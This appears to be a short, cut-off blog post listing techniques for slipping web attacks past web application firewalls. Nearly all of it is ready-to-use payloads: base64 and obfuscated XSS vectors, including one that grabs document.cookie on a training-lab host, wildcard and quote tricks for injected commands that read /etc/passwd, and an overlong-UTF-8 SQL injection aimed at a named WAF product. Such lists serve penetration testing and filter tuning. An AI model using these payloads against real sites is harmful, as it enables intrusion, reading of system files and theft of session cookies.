Member-only story
Generic techniques
- Base64 encoding our payload (/?q=<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=_)
- ASPX removes % not followed by two hex characters (https://site.com/index.php?%file=cat /etc/paswd)
- We can use spaces to fool a WAF (<Img src = x onerror = “javascript: window.onerror = alert; throw XSS”>)
- Backslashes in filtered words (https://site.com/index.php?file=cat /etc/pa\swd)
- Quotes and * https://site.com/index.php?file=cat /etc/pa*swd https://site.com/index.php?file=cat /etc/pa**swd https://site.com/index.php?file=cat /etc/pa’s’wd https://site.com/index.php?file=cat /etc/pa”s”wd
- Wildcards (https://site.com/index.php?file=cat /e??/p????)
- Replace spaces with / (<svg/onload>)
- Custom tags (https://acd91f8b1e2bae3781d35fe600c30081.web-security-academy.net/?search=<CUSTOM+id%3Dx+onfocus%3Dalert(document.cookie) tabindex=1>#x )
- Using different language chars — e.g. ē instead of e
Airlock Ergon
%C0%80'+union+select+col1,col2,col3+from+table+--+Every space here is replaced by a + and we have the %C0 and %80 url encoded values at the beginning of our attack vector.by @Sec Consult
